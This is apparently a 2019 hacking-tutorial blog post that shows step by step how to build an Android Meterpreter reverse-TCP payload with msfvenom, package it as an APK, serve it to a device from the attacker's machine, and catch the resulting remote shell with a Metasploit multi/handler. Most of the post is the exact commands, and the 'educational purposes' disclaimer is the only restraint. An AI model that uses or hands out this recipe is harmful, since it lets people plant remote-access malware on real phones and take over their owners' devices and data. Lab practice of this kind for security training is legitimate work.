Good morning/evening/night my fellow hackers, today’s lesson is on Metasploit and how we can hack Android with a Metasploit payload. So let’s get started!!
As always, this post is for educational purposes and should not be used on your friends or enemies, that’s illegal.
Firstly we are using an Android emulator for this class. You can download the APK yourself from here and try this cool hack.
Once you have that set up, we then need an attacking machine with Metasploit built in, Kali Linux is our go-to attacking machine.
Next we will generate our android payload and make it into an APK so that it is executable, so open up a shell and on the command line type
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=4444 R > androidhack.apk
In the command above we are asking the tool msfvenom to use the payload of reverse TCP, use our attacking IP as the LHOST and 4444 as the LPORT we will use to listen on.
Your IP may differ from ours, you can check with the ifconfig command.
Before we do anything with our new file, we will need to give it permissions to be able to execute, type
chmod 755 androidhack.apk
Once you enter that command the color of the file should turn green.
That’s the payload generated as an APK file that can be installed by any Android device. Next we will need to infect the device.
So let’s install the APK on the Android emulator.
To do that we just need to visit our attacking machine IP, so open a browser on the device and go to 192.168.1.139.
Let’s click on the file and install it on the device, once the app is installed you will be informed, but don’t open it just yet.
Now we need to generate an exploit on our attacking machine, we will do this with Metasploit. So open up a new tab or shell and type msfconsole.
Once the Metasploit console is open we can now generate the exploit. On the command line type
use exploit/multi/handler
Next we need to set the payload for a reverse TCP connection with the app on the Android device. Type
set PAYLOAD android/meterpreter/reverse_TCP
Perfect, now we set up our attacking machines IP as the LHOST again, sotype
set LHOST 192.168.1.139
A show options command will tell us that everything is set up correctly.
All that’s left to do nonw is exploit! type
exploit
Now let’s open the APK file on the Android device, when we click on the Open button we should get a reverse TCP shell from the Android device to our meterpreter shell.
Beauty, it worked!! Just to confirm we can type the command sysinfo.
And as we can see we have managed to hack the device.
Thanks so much for reading to the end, please feel free to like, share or comment.
And don’t forget to subscribe to get more free tutorials like this one.
QuBits 2019-09-04
Linux Security Blog 